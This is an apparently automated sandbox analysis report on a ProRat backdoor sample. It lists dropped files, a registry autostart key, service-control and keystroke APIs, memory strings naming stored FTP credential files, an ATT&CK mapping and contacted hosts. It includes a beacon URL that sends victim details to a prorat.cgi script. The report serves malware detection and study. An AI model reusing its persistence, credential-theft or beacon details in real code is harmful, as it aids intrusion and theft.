Source: C:\Windows\services.exe	File created: C:\Windows\SysWOW64\winkey.dll	Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Windows\SysWOW64\lncom.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run DirectX For Microsoft Windows

Jump to behavior

Source: C:\Windows\SysWOW64\lncom.exe

Code function: 4_2_004085C4 OpenSCManagerA,EnumServicesStatusA,EnumServicesStatusA,CharLowerA,OpenServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,

4_2_004085C4

Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_0046D840 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	4_2_0046D840
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_00488880 IsIconic,GetWindowPlacement,GetWindowRect,	4_2_00488880
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_0047ABBC IsIconic,GetCapture,	4_2_0047ABBC
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_0046ACDC SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,	4_2_0046ACDC
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_0047B45C IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,	4_2_0047B45C

Source: C:\Users\user\Desktop\7b8wRbnmKu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7b8wRbnmKu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\services.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\services.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\services.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\services.exe TID: 7596

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Windows\SysWOW64\lncom.exe	Code function: OpenSCManagerA,EnumServicesStatusA,EnumServicesStatusA,CloseServiceHandle,	4_2_004080A0
Source: C:\Windows\SysWOW64\lncom.exe	Code function: OpenSCManagerA,EnumServicesStatusA,EnumServicesStatusA,CharLowerA,OpenServiceA,ControlService,CloseServiceHandle,CloseServiceHandle,	4_2_00408478
Source: C:\Windows\SysWOW64\lncom.exe	Code function: OpenSCManagerA,EnumServicesStatusA,EnumServicesStatusA,CharLowerA,OpenServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,	4_2_004085C4
Source: C:\Windows\SysWOW64\lncom.exe	Code function: OpenSCManagerA,EnumServicesStatusA,EnumServicesStatusA,CharLowerA,OpenServiceA,QueryServiceConfigA,QueryServiceConfigA,CloseServiceHandle,OpenServiceA,ChangeServiceConfigA,CloseServiceHandle,CloseServiceHandle,	4_2_0040871C
Source: C:\Windows\SysWOW64\lncom.exe	Code function: OpenSCManagerA,EnumServicesStatusA,EnumServicesStatusA,CharLowerA,OpenServiceA,ControlService,CloseServiceHandle,OpenServiceA,DeleteService,CloseServiceHandle,CloseServiceHandle,	4_2_004088E4

Source: C:\Windows\services.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\lncom.exe

Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,

4_2_0046CF24

Source: C:\Windows\SysWOW64\lncom.exe

API coverage: 8.0 %

Source: C:\Windows\SysWOW64\lncom.exe

Code function: 4_2_0045D244 GetSystemInfo,

4_2_0045D244

Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_00494BD0 GetModuleHandleA,GetProcAddress,lstrcpy,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpy,lstrlen,lstrcpy,	4_2_00494BD0
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_0048B4A8 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	4_2_0048B4A8
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_0048B584 FindFirstFileA,GetLastError,	4_2_0048B584

Source: C:\Windows\services.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\services.exe

API call chain: ExitProcess graph end node

graph_8-2130

Source: lncom.exe, 00000004.00000002.360533258.000000000090F000.00000004.00000020.00020000.00000000.sdmp, lncom.exe, 00000004.00000003.359863693.000000000090C000.00000004.00000020.00020000.00000000.sdmp, fservice.exe, 00000006.00000003.359639520.000000000089B000.00000004.00000020.00020000.00000000.sdmp, fservice.exe, 00000006.00000002.360807395.000000000089D000.00000004.00000020.00020000.00000000.sdmp, services.exe, 00000008.00000002.620024103.0000000000A12000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\lncom.exe

Code function: 4_2_00418B3C LoadLibraryA,GetProcAddress,GetCurrentProcessId,

4_2_00418B3C

Source: C:\Windows\SysWOW64\lncom.exe

Code function: 4_2_00402184 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcessHeap,RtlAllocateHeap,

4_2_00402184

Source: C:\Windows\SysWOW64\lncom.exe

Code function: 4_2_0042A528 keybd_event,keybd_event,Sleep,keybd_event,keybd_event,Sleep,keybd_event,keybd_event,Sleep,keybd_event,keybd_event,Sleep,keybd_event,keybd_event,Sleep,keybd_event,keybd_event,Sleep,

4_2_0042A528

Source: C:\Users\user\Desktop\7b8wRbnmKu.exe

Process created: C:\Windows\SysWOW64\lncom.exe "C:\Windows\system32\lncom.exe"

Jump to behavior

Source: lncom.exe, lncom.exe, 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Program Manager
Source: lncom.exe, lncom.exe, 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Shell_TrayWnd
Source: lncom.exe, 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: (value not set)(Default)(Default)HKEY_CLASSES_ROOTHKEY_CURRENT_USERHKEY_LOCAL_MACHINEHKEY_USERSHKEY_CURRENT_CONFIG<..>[GetValueNames]HKEY_CLASSES_ROOTHKEY_CURRENT_USERHKEY_LOCAL_MACHINEHKEY_USERSHKEY_CURRENT_CONFIGHKEY_CLASSES_ROOTHKEY_CURRENT_USERHKEY_LOCAL_MACHINEHKEY_USERSHKEY_CURRENT_CONFIGHKEY_CLASSES_ROOTHKEY_CURRENT_USERHKEY_LOCAL_MACHINEHKEY_USERSHKEY_CURRENT_CONFIGHKEY_CLASSES_ROOTHKEY_CURRENT_USERHKEY_LOCAL_MACHINEHKEY_USERSHKEY_CURRENT_CONFIGHKEY_CLASSES_ROOTHKEY_CURRENT_USERHKEY_LOCAL_MACHINEHKEY_USERSHKEY_CURRENT_CONFIGHKEY_CLASSES_ROOTHKEY_CURRENT_USERHKEY_LOCAL_MACHINEHKEY_USERSHKEY_CURRENT_CONFIGHKEY_CLASSES_ROOTHKEY_CURRENT_USERHKEY_LOCAL_MACHINEHKEY_USERSHKEY_CURRENT_CONFIGrbcuteftpanonymous================================Host :Login :Password :================================rbanonymousH================================Label :Host :Login :Pass :================================rb================================anonymousHost :Login :Password :================================SOFTWARE\Microsoft\Windows\CurrentVersionProgramFilesDirC:\Program Files\GlobalSCAPE\CuteFTP\sm.dat\GlobalSCAPE\CuteFTP\smdata.dat\CuteFTP\tree.dat\CuteFTP\smdata.dat\GlobalSCAPE\CuteFTP Pro\sm.dat\GlobalSCAPE\CuteFTP\5.0\sm.dat\GlobalSCAPE\CuteFTP\sm.dat\GlobalSCAPE\CuteFTP Pro\2.0\sm.dat\GlobalSCAPE\CuteFTP Pro\3.0\sm.dat\GlobalSCAPE\CuteFTP Pro\6.0\sm.datSOFTWARE\Microsoft\Windows\CurrentVersionProgramFilesDirC:\Program Files\GlobalSCAPE\CuteFTP\smdata.dat\CuteFTP\tree.dat\CuteFTP\smdata.datStartedStopped\|\|\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\RatingsKeyFileName0\RSACi.rat\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\.DefaultAllow_UnknownsPleaseMomEnabled\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\.Default\http://www.rsac.org/ratingsv01.htmlvsln\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0dwFlagserrLine\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0\PRPolicy\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0\PRPolicyPRNumPolicy\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0\PRPolicyPRNumPolicy\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0\PRPolicy\PRPPolicyAttribute\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0\PRPolicy\\PRPPolicySubPRNumURLExpressions\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0\PRPolicy\\PRPPolicySub\0PRBUInternetPatternPRBUNonWildPRBUSpecifiedPRBUHostPRBUPort80PRBUUrl\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratingsanonymous0x0xunkownSOFTWARE\Microsoft\Windows\CurrentVersionProgramFilesDirC:\Program Files\FlashFXP\Sites.datSites.datPass============================================IP-HOST : IPUnkownUser : U
Source: lncom.exe, 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: WindowsSoftware\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}\StubPathSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\ShellExplorer.exe HataHataErrorKSil1000000000300Dedected burute force atack from your ip adress ()Sifre_Tamam000300Dedected burute force atack from your ip adress ()Sifre_Hatasi000001000001000002000002000003User clicked: ABORTUser clicked: CANCELUser clicked: IGNOREUser clicked: NOUser clicked: OKUser clicked: RETRYUser clicked: YESThere is not enough memory to create the message box.000003000004000004000005y40160000006000007shutdown.exe -s -t 00000008shutdown.exe -r -t 00000009shutdown.exe -l0000100000111y601600y70160000012000013x80160000014Program Managerx90160000015Program Managerx10160000016Shell_TrayWndButtonx11160000017Shell_TrayWndButtonx12160000018Shell_TrayWndx13160000019Shell_TrayWndx14160000020Set cdaudio door open waitx15160000021Set cdaudio door closed waitx16160000022x17160000023x18160000024x19160000025[Shell]Command=2[Taskbar]Command=ToggleDesktop\refresh.scfopenopenx20160000039x21160000026x22160000027x23160000028x24160000029x25160000030x26160000031x27160000032x28160000035x29160000036x30160000037x31160000038x32160000040CONTROL.EXE desk.cplx33160000041CONTROL.EXE hdwwiz.cplx33160000042CONTROL.EXE inetcpl.cplx33160000043CONTROL.EXE appwiz.cplx33160000044CONTROL.EXE intl.cplx33160000045CONTROL.EXE joy.cplx33160000046CONTROL.EXE access.cplx33160000047CONTROL.EXE main.cplx33160000048CONTROL.EXE ncpa.cplx33160000049CONTROL.EXE nusrmgr.cplx33160000050CONTROL.EXE timedate.cplx33160000051CONTROL.EXE mmsys.cplx33160000052CONTROL.EXE powercfg.cplx33160000053CONTROL.EXE sysdm.cplx33160000054CONTROL.EXE telephon.cplx33160000055CONTROL.EXE odbccp32.cplx33160000060000060000061000061000062x34160000063openx35160000064x36160000065x37160000066yesx38160000067nox39160000068\SOFTWARE\Microsoft\Internet Explorer\TypedURLs////////// URL HISTORY //////////url1url2url3url4url5url6url7url8url9url10url11url12url13url14url15url16url17url18url19url20url21url22url23url24url25000068000079000079000080x41160000081 x42160000082x43160000083x441600000841x45160000085000085000086========= =========

Source: C:\Windows\SysWOW64\cmd.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Windows\SysWOW64\lncom.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpy,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpy,LoadLibraryExA,lstrcpy,LoadLibraryExA,lstrcpy,LoadLibraryExA,	4_2_00494D78
Source: C:\Windows\SysWOW64\lncom.exe	Code function: GetLocaleInfoA,GetLocaleInfoA,	4_2_0049C0B4
Source: C:\Windows\SysWOW64\lncom.exe	Code function: GetLocaleInfoA,SetLastError,GetLocaleInfoA,	4_2_0049C254
Source: C:\Windows\SysWOW64\lncom.exe	Code function: SetLastError,GetLocaleInfoA,	4_2_0049C2B0
Source: C:\Windows\SysWOW64\lncom.exe	Code function: SetLastError,GetUserDefaultLCID,GetLocaleInfoA,IsValidLocale,SetLastError,SetThreadLocale,SetLastError,GetCPInfo,SetLastError,	4_2_0049B10C
Source: C:\Windows\SysWOW64\lncom.exe	Code function: GetLocaleInfoA,GetLocaleInfoA,SetLastError,GetSystemDefaultLangID,GetLocaleInfoA,SetLastError,GetLocaleInfoA,	4_2_0049B6C0

Source: C:\Windows\SysWOW64\lncom.exe

Code function: 4_2_0048C6DC GetLocalTime,

4_2_0048C6DC

Source: C:\Windows\SysWOW64\lncom.exe

Code function: 4_2_00444360 GetTimeZoneInformation,

4_2_00444360

Source: C:\Windows\SysWOW64\lncom.exe

Code function: 4_2_0040C1BC GetVersionExA,GetVersionExA,

4_2_0040C1BC

Source: C:\Windows\SysWOW64\lncom.exe

Code function: 4_2_004102D0 GetUserNameA,

4_2_004102D0

Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_00432294 @Wsocket@WSocket_bind$qqrir11sockaddr_ini,@Wsocket@WSocketGetProc$qqrx17System@AnsiString,	4_2_00432294
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_004349B4 @Wsocket@TCustomWSocket@BindSocket$qqrv,@Wsocket@WSocket_htons$qqrus,@Wsocket@WSocketResolveHost$qqr17System@AnsiString,@Wsocket@WSocket_bind$qqrir11sockaddr_ini,@Wsocket@WSocket_WSAGetLastError$qqrv,@Wsocket@WSocket_getsockname$qqrir11sockaddr_inri,@Wsocket@WSocket_WSAGetLastError$qqrv,@Wsocket@WSocket_ntohs$qqrus,	4_2_004349B4
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_0044B16C bind,listen,	4_2_0044B16C
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_004371E8 @Wsocket@TCustomSocksWSocket@Listen$qqrv,@Wsocket@TCustomWSocket@Listen$qqrv,	4_2_004371E8
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_00435208 @Wsocket@TCustomWSocket@Listen$qqrv,@Wsocket@WSocket_WSASetLastError$qqri,@Wsocket@TCustomWSocket@SocketError$qqr17System@AnsiString,@Wsocket@WSocket_WSASetLastError$qqri,@Wsocket@TCustomWSocket@SocketError$qqr17System@AnsiString,@Wsocket@WSocket_WSASetLastError$qqri,@Wsocket@TCustomWSocket@SocketError$qqr17System@AnsiString,@Wsocket@WSocketResolveProto$qqr17System@AnsiString,@Wsocket@TCustomWSocket@GetProto$qqrv,@Wsocket@WSocketResolvePort$qqr17System@AnsiStringt1,@Wsocket@WSocket_htons$qqrus,@Wsocket@WSocketResolveHost$qqr17System@AnsiString,@Wsocket@TCustomWSocket@DeleteBufferedData$qqrv,@Wsocket@WSocket_socket$qqriii,@Wsocket@TCustomWSocket@SocketError$qqr17System@AnsiString,@Wsocket@WSocket_bind$qqrir11sockaddr_ini,@Wsocket@TCustomWSocket@ChangeState$qqr20Wsocket@TSocketState,@Wsocket@TCustomWSocket@SocketError$qqr17System@AnsiString,@Wsocket@TCustomWSocket@ChangeState$qqr20Wsocket@TSocketState,@Wsocket@TCustomWSocket@ChangeState$qqr20Wsocket@TSocketState,@Wsocket@WSocket_listen$qqrii,@Wsocket@TCustomWSocket@ChangeState$qqr20Wsocket@TSocketState,@Wsocket@TCustomWSocket@SocketError$qqr17System@AnsiString,@Wsocket@WSocket_WSAAsyncSelect$qqriuiii,@Wsocket@TCustomWSocket@SocketError$qqr17System@AnsiString,	4_2_00435208

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Scripting	11 Windows Service	11 Windows Service	1 Deobfuscate/Decode Files or Information	121 Input Capture	2 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	4 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 Defacement
Default Accounts	1 Native API	1 Registry Run Keys / Startup Folder	12 Process Injection	1 Scripting	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	121 Input Capture	Exfiltration Over Bluetooth	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	12 Service Execution	Logon Script (Windows)	1 Registry Run Keys / Startup Folder	31 Obfuscated Files or Information	Security Account Manager	1 System Service Discovery	SMB/Windows Admin Shares	1 Clipboard Data	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Software Packing	NTDS	2 File and Directory Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	123 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 File Deletion	LSA Secrets	25 System Information Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	221 Masquerading	Cached Domain Credentials	121 Security Software Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	21 Virtualization/Sandbox Evasion	DCSync	21 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	12 Process Injection	Proc Filesystem	2 Process Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	11 Application Window Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	1 System Owner/User Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Right-to-Left Override	Input Capture	1 Remote System Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
7b8wRbnmKu.exe	95%	ReversingLabs	Win32.Backdoor.ProRAT
7b8wRbnmKu.exe	86%	Virustotal		Browse
7b8wRbnmKu.exe	100%	Avira	BDS/Backdoor.Gen

Dropped Files

Source	Detection	Scanner	Label
C:\Windows\SysWOW64\lncom.exe	100%	Avira	BDS/ProRat.Gen
C:\Windows\SysWOW64\winkey.dll	100%	Avira	TR/Spy.ProAgen.20.E
C:\Windows\System\sservice.exe	100%	Avira	BDS/ProRat.Gen
C:\Windows\SysWOW64\reginv.dll	100%	Avira	BDS/Probat.B.77.A
C:\Windows\services.exe	100%	Avira	BDS/ProRat.Gen
C:\Windows\SysWOW64\fservice.exe	100%	Avira	BDS/ProRat.Gen
C:\Windows\SysWOW64\lncom.exe	100%	Joe Sandbox ML
C:\Windows\System\sservice.exe	100%	Joe Sandbox ML
C:\Windows\services.exe	100%	Joe Sandbox ML
C:\Windows\SysWOW64\fservice.exe	100%	Joe Sandbox ML
C:\Windows\SysWOW64\fservice.exe	96%	ReversingLabs	Win32.Backdoor.ProRAT
C:\Windows\SysWOW64\lncom.exe	96%	ReversingLabs	Win32.Backdoor.ProRAT
C:\Windows\SysWOW64\reginv.dll	88%	ReversingLabs	Win32.Backdoor.ProRAT
C:\Windows\SysWOW64\winkey.dll	88%	ReversingLabs	Win32.Backdoor.ProRAT
C:\Windows\System\sservice.exe	96%	ReversingLabs	Win32.Backdoor.ProRAT
C:\Windows\services.exe	96%	ReversingLabs	Win32.Backdoor.ProRAT

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
mta7.am0.yahoodns.net	0%	Virustotal	Browse
www.yoursite.com	0%	Virustotal	Browse
you.no-ip.com	1%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://www.yoursite.com/cgi-bin/prorat.cgi	0%	Avira URL Cloud	safe
http://www.yoursite.com/cgi-bin/prorat.cgi?bilgisayaradi=______&ipadresiX	0%	Avira URL Cloud	safe
http://www.yoursite.com/cgi-bin/prorat.cgi?bilgisayaradi=______&ipadresi=192.168.2.3&serverportu=5110&kurban=victim&servermodeli=V1.9:Fix-18&serversaati=11:19:43_AM&servertarihi=6/19/2023&serversifre=123&islem=log	0%	Avira URL Cloud	safe
http://www.yoursite.com/cgi-bin/prorat.cgi?bilgisayaradi=______&ipadresiXW	0%	Avira URL Cloud	safe
http://www.yoursite.com/cgi-bin/prorat.cgi?bilgisayaradi=______&ipadresi=192.168.2.3&serverportu=511	0%	Avira URL Cloud	safe
http://www.rsac.org/ratingsv01.html	0%	Avira URL Cloud	safe
http://www.rsac.org/ratingsv01.htmlvsln	0%	Avira URL Cloud	safe
https://postmaster.yahooinc.com/error-codes	0%	Avira URL Cloud	safe
http://www.yoursite.com/cgi-bin/prorat.cgi?bilgisayaradi=___L	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
mta7.am0.yahoodns.net	67.195.204.79	true	true	0%, Virustotal, Browse	unknown
www.ovip.icq.com	178.237.20.14	true	false		high
www.yoursite.com	188.114.97.7	true	true	0%, Virustotal, Browse	unknown
www.icq.com	unknown	unknown	false		high
you.no-ip.com	unknown	unknown	true	1%, Virustotal, Browse	unknown
yahoo.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.icq.com/friendship/email_thank_you.php?folder_id=18984&params_count=0&nick_name=Pro_Rat&user_email=Pro_Rat@yahoo.com&user_uin=&friend_nickname=&friend_contact=157116797&friend_nickname2=&friend_contact2=&x=60&y=15	false		high
http://www.yoursite.com/cgi-bin/prorat.cgi?bilgisayaradi=______&ipadresi=192.168.2.3&serverportu=5110&kurban=victim&servermodeli=V1.9:Fix-18&serversaati=11:19:43_AM&servertarihi=6/19/2023&serversifre=123&islem=log	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.rsac.org/ratingsv01.htmlvsln	lncom.exe, 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmp	false	Avira URL Cloud: safe	unknown
http://www.yoursite.com/cgi-bin/prorat.cgi	services.exe, 00000008.00000002.620299094.0000000002800000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://postmaster.yahooinc.com/error-codes	services.exe, 00000008.00000002.620395892.0000000004789000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.yoursite.com/cgi-bin/prorat.cgi?bilgisayaradi=______&ipadresiX	services.exe, 00000008.00000002.620299094.0000000002800000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.yoursite.com/cgi-bin/prorat.cgi?bilgisayaradi=______&ipadresi=192.168.2.3&serverportu=511	services.exe, 00000008.00000002.620395892.0000000004789000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.yoursite.com/cgi-bin/prorat.cgi?bilgisayaradi=______&ipadresiXW	services.exe, 00000008.00000002.620299094.0000000002800000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.icq.com/friendship/pages/send_by_email_18984.php	lncom.exe, lncom.exe, 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmp, services.exe, 00000008.00000002.620395892.0000000004789000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.rsac.org/ratingsv01.html	lncom.exe, lncom.exe, 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmp	false	Avira URL Cloud: safe	unknown
http://www.yoursite.com/cgi-bin/prorat.cgi?bilgisayaradi=___L	services.exe, 00000008.00000002.620299094.0000000002800000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.icq.com/friendship/pages/send_by_email_18984.phpAccept-Language:	lncom.exe	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
188.114.97.7	www.yoursite.com	European Union	13335	CLOUDFLARENETUS	true
178.237.20.14	www.ovip.icq.com	Russian Federation	47764	MAILRU-ASMailRuRU	false
67.195.204.79	mta7.am0.yahoodns.net	United States	26101	YAHOO-3US	true

General Information

Joe Sandbox Version:	37.1.0 Beryl
Analysis ID:	890233
Start date and time:	2023-06-19 11:18:19 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	7b8wRbnmKu.exe (renamed file extension from none to exe, renamed because original name is a hash value)
Original Sample Name:	24cb55a207a9eb0047a6acf94c92ea7eac1540e6cece817915e6594887318961
Detection:	MAL
Classification:	mal100.rans.troj.spyw.evad.winEXE@11/9@5/3
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 21.7% (good quality ratio 20.3%) Quality average: 73.9% Quality standard deviation: 27.9%
HCA Information:	Successful, ratio: 88% Number of executed functions: 82 Number of non-executed functions: 202

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, RuntimeBroker.exe, WMIADAP.exe, Microsoft.Photos.exe, conhost.exe, ApplicationFrameHost.exe
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:19:13	API Interceptor	3x Sleep call for process: services.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.97.7	SecuriteInfo.com.DeepScan.Generic.Trojan.Genesis.Marte.A.91E2684C.13689.18205.dll	Get hash	malicious	Unknown	Browse	dodge-tv.com/hittest.php?a=eYg6e9KQoVou3MS&id=0
	SecuriteInfo.com.DeepScan.Generic.Trojan.Genesis.Marte.A.1A87B4BB.2985.872.dll	Get hash	malicious	Unknown	Browse	dodge-tv.com/hittest.php?a=a5bKtBa1eWFtNSo&id=0
	libqrencode.dll	Get hash	malicious	Unknown	Browse	dodge-tv.com/hittest.php?a=c1VO8r2ObuWZK4d&id=0
	Order_(AONE1728-2023).exe	Get hash	malicious	FormBook	Browse	www.bottomlinehq.online/ga94/?oR-LpNfx=ey9W5rLdXzV96w+4YVQff5O+1GRBVv3Qr6NWV6fuUgVhtQcJrlQWwmHQjyExqmHE5pwEuzwdew==&i4=aVhTKl
	SecuriteInfo.com.DeepScan.Generic.Trojan.Genesis.Marte.A.6EAFB7F0.16244.15893.dll	Get hash	malicious	Unknown	Browse	rth-do.com/hittest.php?a=5UgbsFcYHcC5lSU&id=0
